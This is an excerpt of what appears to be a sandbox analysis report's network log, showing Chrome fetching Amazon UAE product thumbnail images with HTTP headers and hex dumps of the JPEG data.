                                                                                                                                                                                                        Surrogate-Key: x-cache-756 /images/S/al-eu-726f4d26-7fdb/192b0df3-8002-4ca6-8283-ff7193353200
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Date: Thu, 18 Jan 2024 15:26:15 GMT
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Via: 1.1 c7311454ce938e04f3523616a5b033da.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: ZRH55-P1
                                                                                                                                                                                                        X-Amz-Cf-Id: eo_fsmR2i02Y3vhSwac4098MX4rDIhSWmNeYZ_V8kDYYX4O_bKnuRg==
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e1 00 4a 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 01 00 69 87 04 00 01 00 00 00 1a 00 00 00 00 00 00 00 01 00 86 92 07 00 15 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 65 72 73 69 6f 6e 20 31 2e 30 2e 30 00 ff db 00 43 00 06 04 04 04 05 04 06 05 05 06 09 06 05 06 09 0b 08 06 06 08 0b 0c 0a 0a 0b 0a 0a 0c 10 0c 0c 0c 0c 0c 0c 10 0c 0e 0f 10 0f 0e 0c 13 13 14 14 13 13 1c 1b 1b 1b 1c 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f ff db 00 43 01 07 07 07 0d 0c 0d 18 10 10 18 1a 15 11 15 1a 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f ff c0 00 11 08 01 f4 07 94 03 00 11 00 01 11 01 02 11 01 ff c4
                                                                                                                                                                                                        Data Ascii: JFIFJExifII*i,Version 1.0.0CC
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC8949INData Raw: 8e 6f 52 94 4f 48 d7 8c b6 39 1a d2 d6 bd a3 a6 5a 1c 71 e0 82 c9 6e d0 b6 9b 3d 25 5c 56 7d f1 cd 54 f6 b8 be a2 47 4a 03 23 71 73 29 db 9f 72 26 6e 3b 5a de 99 41 64 9f 87 d5 2c 1f 89 7c 80 77 0c b2 41 ff 00 ba 54 8b 4d 6e 8e ba 46 d2 09 61 1d 09 91 8f 6f 2e f3 d0 82 88 66 36 fa 7a b8 a5 89 cf 3b 68 e4 88 3a 9e 95 cc c3 a3 7c 63 69 95 c4 f7 bd a4 00 14 25 70 71 db 01 3e 48 28 ef d7 01 6b d2 f7 3b 81 e5 ea 94 d2 cb ff 00 55 19 7f ee 58 f5 96 ca f2 e6 f9 e0 f7 17 3d ce 3d 5c 72 57 41 ca 02 94 26 0a 50 98 29 42 28 84 50 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10
                                                                                                                                                                                                        Data Ascii: oROH9Zqn=%\V}TGJ#qs)r&n;ZAd,|wATMnFao.f6z;h:|ci%pq>H(k;UX==\rWA&P)B(P
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC16384INData Raw: d9 4d 47 0a 6b 86 4d 1d d6 39 1b dc 27 88 b7 f6 9a b5 46 78 f1 87 1a 9e d1 d7 f3 d2 63 e5 2c 4a f3 69 b8 59 6a 8d 2d cd 8d 8a 40 d3 23 24 69 dd 1b e3 1f 4d 87 ef 0b 6c 4e fd 1d cd 2e a6 99 eb c5 8e 77 8e 9e b1 3e a9 6a 6d 57 6a 58 c4 95 54 13 c3 0b 80 2d 9d ec fc 59 0e e9 97 0e 99 4d e3 cd 38 f5 38 af 3b 56 d5 99 f2 f1 52 38 80 d2 49 c0 1d 4f 40 a5 be 00 41 e6 08 3f 03 90 89 7b c9 5b 53 2d 2c 54 b2 10 62 88 ee 8f 97 b4 3c b2 b5 c6 3a c5 a6 d1 d6 5a 6b 82 b5 bc de 3a cb c7 a2 d8 da 81 44 ae 76 8a 18 9c c9 2b aa d8 1d 49 08 3b 5a 7a 39 c3 ae 47 92 ab a8 cb 31 31 4a f7 a5 43 57 9e 62 63 1d 27 e3 95 ba 57 b2 49 5d 24 71 f6 51 b8 92 d8 b3 9d a0 f7 2b 31 13 11 b4 ce eb b5 ac c4 44 4c ef 3e 69 39 a9 64 f7 b7 cd 14 15 d0 4b 29 db 13 1d 97 bb 19 c7 2e b8 5a f2 d6
                                                                                                                                                                                                        Data Ascii: MGkM9'Fxc,JiYj-@#$iMlN.w>jmWjXT-YM88;VR8IO@A?{[S-,Tb<:Zk:Dv+I;Zz9G11JCWbc'WI]$qQ+1DL>i9dK).Z
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC16384INData Raw: 51 fc 45 92 ff 00 9d 37 16 ff 00 f2 aa 3f fb 2b 3f c5 3d cd 4f c4 59 6a d5 5e 90 1c 47 d4 f6 0a bb 15 d2 a6 9d d4 15 a1 ad 9d b1 40 d8 de 43 1e d9 00 0e 1d 39 b0 29 ae 28 89 dd 16 cd 69 8d a5 ad d6 c6 a7 d0 ce 1e 6a 78 75 3e 89 b3 5f 23 7e f7 56 52 c6 6a 39 83 89 d8 36 4c d2 47 e4 c8 d7 05 42 f1 b4 ec e9 d2 db c4 4b 55 fa 55 f0 f2 b6 f9 a7 a8 f5 35 b2 17 4f 57 64 de ca d8 58 0b 9c ea 49 30 e2 f0 06 49 ec 9c dc 9f cd 24 f7 2d b8 2f b4 ec d3 a8 a6 f1 bb 91 d5 a5 21 07 d2 e5 ce 75 5c 39 e9 25 fc 74 ea 2f fd 4f fb 8c 0a ee 1e ec 39 f9 fb f2 ce 3d 0e bf d6 8d 41 ff 00 32 8b fb 55 86 a3 a4 36 69 ba cb a3 f5 d7 fa 93 a8 7f 9b 2b 3f bb bd 57 af 58 5a bf 49 7c ed 57 dc c7 5e fa 20 ff 00 16 b7 2f e7 99 ff 00 ba d3 2a b9 fb cb ba 6e ef d5 7c f4 9d fe 27 ae 9f cb d2
                                                                                                                                                                                                        Data Ascii: QE7?+?=OYj^G@C9)(ijxu>_#~VRj96LGBKUU5OWdXI0I$-/!u\9%t/O9=A2U6i+?WXZI|W^ /*n|'
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC16384INData Raw: 7a 37 c9 7b 5e 7b cc cb d8 da d5 e0 ac 44 7c 71 33 bc ed e1 e0 b0 6b 0d 2a 6e e7 d7 a8 48 fc 36 c6 12 68 cb 87 6b 51 13 3a 34 b4 91 f8 c6 8e 6d 3d e1 73 3b 47 41 ef 63 8e bd f8 ff 00 f2 ff 00 97 67 b3 3b 43 dc 7c 17 ff 00 2b 7e f7 85 67 fb 7f 0d 75 1c 8e 64 8d 95 9c a4 89 d9 68 39 04 39 a7 98 77 ef 5e 62 63 78 98 97 ab 98 8b 46 d3 d2 55 37 2a c8 2b 6a 1b 50 c8 5d 0c 85 a0 4c 09 c8 73 87 42 16 ac 38 e6 91 b4 ce f1 e0 d3 a6 c1 6c 55 e1 99 e2 8f 05 1f 4e a4 f3 5b 56 10 77 dd cb 9f 44 4a e7 6d ae a5 b7 5b 25 9a 09 1a eb 9c cf d9 b0 fb c3 f2 4f e8 80 aa e6 c5 6c 97 88 9e e4 39 fa 8c 16 cb 96 2b 3f e5 c7 fd fb ac ee 74 85 dd ab 9f ba 57 b8 ef 71 ea 49 ea 55 c8 88 e9 1d 17 a2 36 e5 08 90 fc 91 c8 ec 19 6f 89 28 96 e2 e0 a5 0b a2 d3 35 75 8e e6 fa da c7 74 f0 89
                                                                                                                                                                                                        Data Ascii: z7{^{D|q3k*nH6hkQ:4m=s;GAcg;C|+~gudh99w^bcxFU7*+jP]LsB8lUN[VwDJm[%Ol9+?tWqIU6o(5ut
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC16384INData Raw: f2 7c 7a f7 e3 b4 db f5 4c cf dd e5 18 c3 b1 f9 20 0e 5d 39 05 2c 51 a3 19 9d cf 3d 03 8f ec 85 12 ca 1c 77 e9 35 76 35 dc 4e 96 9c 3b 2c b7 d2 41 00 1e 05 e0 d4 1f b6 65 63 4f 1f 0a ae ae 7e 3d bc 9a 9c 2d ea c9 82 94 26 0a 58 a6 52 22 88 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10
                                                                                                                                                                                                        Data Ascii: |zL ]9,Q=w5v5N;,AecO~=-&XR"
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC3896INData Raw: 80 80 80 80 82 0f 63 1e d2 c7 b4 39 8e e4 e6 91 90 47 98 2a 2d 58 b4 6d 31 bc 26 26 62 77 86 35 73 d0 16 3a b2 e9 29 c3 a8 a6 77 53 09 f6 0f c5 87 97 d4 b8 1a bf 67 34 f9 77 9a fc 16 f4 e9 f6 75 b4 fd b5 9a 9c ad f1 c7 af f7 63 b5 3c 34 bb 44 ed d4 b5 10 cd e0 48 74 4e fb 32 17 0b 2f b2 d9 eb 3f 05 ab 3f 78 75 71 f6 fe 29 ef 45 a3 f7 78 b7 4a 6b 98 4e d8 9d 20 1e 2c a9 c0 1f 59 5a a3 b1 fb 46 b3 ca 67 ff 00 97 fc b6 4f 69 68 ed d7 6f fe 2f 78 f4 cf 10 25 e4 fa b7 c6 0f 7b aa 09 fb 1a 16 fa f6 57 69 5b ad e6 3f fb 9a a7 5f a1 8e 95 df ff 00 b5 5b 4d c3 9a d9 c8 75 d6 eb 2c 83 be 38 9c ef eb 3c 9f b9 5c c3 ec d5 ed fe 76 49 9f 48 ff 00 9f ec d1 93 b7 69 5f f2 b1 c4 7c ff 00 e1 59 74 b1 c3 6b b6 9b 4e 9c a3 ec eb ee 7f 8b 92 ab 04 ec 8c 7b f2 4b 21 f0 07 90
                                                                                                                                                                                                        Data Ascii: c9G*-Xm1&&bw5s:)wSg4wuc<4DHtN2/??xuq)ExJkN ,YZFgOiho/x%{Wi[?_[Mu,8<\vIHi_|YtkN{K!


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        110192.168.2.44989118.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:06 UTC458OUTGET /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745515_372x232_2X_en_AE._SY116_CB558011712_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC936INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 2602
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: a9295cd5-b075-4496-a04c-2adc6d499a68
                                                                                                                                                                                                        Date: Sun, 21 Jul 2024 20:00:07 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 30 Apr 2024 09:55:58 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-288,/images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745515_372x232_2X_en_AE
                                                                                                                                                                                                        Expires: Sat, 16 Jul 2044 20:00:07 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-288 /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745515_372x232_2X_en_AE
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 ca0e18fe48e6994b3446a58a1e05c1ce.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 1385080
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: EkQ3rOVie_qoe6z2L3I4D2flRrSj7HNVFR7GLw0N08RQHRztufo-Pw==
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC2602INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 9b 00 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 07 08 05 06 02 03 04 01 09 10 00 01 03 03 02 04 04 02 06 07 09 00 00 00 00 00 01 00 02 03 04 11 12 05 21 06 07 31 41 13 22 51 61 14 23 55 71 72 81 91 b1 15 32 52 93 94 a1 c1 08 17
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1A"Qa#Uqr2R


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        111192.168.2.44989318.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC458OUTGET /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745536_372x232_2X_en_AE._SY116_CB558011712_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC936INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 1912
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 05904073-7c1d-4d18-883c-b1593291b8ba
                                                                                                                                                                                                        Date: Sat, 20 Jul 2024 14:45:00 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 30 Apr 2024 09:55:58 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-797,/images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745536_372x232_2X_en_AE
                                                                                                                                                                                                        Expires: Fri, 15 Jul 2044 14:45:00 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-797 /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745536_372x232_2X_en_AE
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Via: 1.1 2f7ba54d76b215238a170acfd87327d6.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 1991940
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: CtWmZdu6U0dJwTmNPSYPPomCkJ8gup2CP5_oMZzSWOZhoJXNVLMngw==
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC1912INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 91 00 01 00 02 02 03 01 00 00 00 00 00 00 00 00 00 00 00 05 06 01 04 02 03 07 08 10 00 02 01 03 03 01 06 03 05 06 07 00 00 00 00 00 00 01 02 03 04 11 05 12 21 31 06 13 22 41 51 71 07 32 61 43 62 72 81 91 23 33 34 42 a1 d2 14 16 52 63 b1
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1"AQq2aCbr#34BRc


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        112192.168.2.44989418.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC458OUTGET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763848_372x232_2X_en_AE._SY116_CB558609315_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC913INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 4686
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: c597ef0f-abc0-4460-aca3-e5e6ae32e5ab
                                                                                                                                                                                                        Date: Wed, 31 Jul 2024 07:32:36 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 07 May 2024 08:31:11 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-982,/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763848_372x232_2X_en_AE
                                                                                                                                                                                                        Expires: Tue, 26 Jul 2044 07:32:36 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-982 /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763848_372x232_2X_en_AE
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Via: 1.1 fa63af50c0e4f34ddecf2b2d0dca224e.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 323477
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: MKQ8Nd624lVqeNIeaByO6EGXMyfszA_A9gO6QfngwEWDSU5IYGFDNQ==
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC4686INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 94 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 07 02 04 05 06 08 03 01 10 00 02 01 03 03 03 02 03 06 03 04 08 07 00 00 00 01 02 03 00 04 11 05 12 21 06 22 31 13 41 07 14 51 23 32 42 61 71 92 33 72 81 15 24 53 a1 16 44 54 82 91
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!"1AQ#2Baq3r$SDT


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        113192.168.2.44989718.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC458OUTGET /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745525_372x232_2X_en_AE._SY116_CB558011712_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC914INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 2251
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 65818c8d-18b2-48f1-bf16-7c695b1f6324
                                                                                                                                                                                                        Date: Tue, 13 Aug 2024 07:49:33 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 30 Apr 2024 09:55:58 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-615,/images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745525_372x232_2X_en_AE
                                                                                                                                                                                                        Expires: Mon, 08 Aug 2044 07:49:33 GMT
                                                                                                                                                                                                        Surrogate-Key: x-cache-615 /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745525_372x232_2X_en_AE
                                                                                                                                                                                                        X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                        Via: 1.1 c27d2e9d4c6e59d1b92ac8671f0bfb9c.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 193714
                                                                                                                                                                                                        Server-Timing: provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                        X-Amz-Cf-Id: M7bDSvidSxOZxLjQ7e0GQWu-oDkXC2tn-WXJUR1LO1DKZP3MXyLedg==
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC2251INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 92 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 04 03 05 06 07 08 01 02 09 10 00 02 02 02 01 01 03 06 0c 05 04 03 00 00 00 00 01 02 00 03 04 11 05 12 06 21 31 13 22 41 71 a1 b3 07 14 32 33 51 61 63 72 74 91 b1 b2 24 34 52 73 c1
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1"Aq23Qacrt$4Rs


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        114192.168.2.44989618.239.85.2234434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC458OUTGET /images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745538_372x232_2X_en_AE._SY116_CB558011712_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:07 UTC936INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        Content-Length: 1743
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: bef8afd6-a12d-4991-885c-90c1c5137af7
                                                                                                                                                                                                        Date: Sun, 11 Aug 2024 23:36:46 GMT
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 30 Apr 2024 09:55:58 GMT
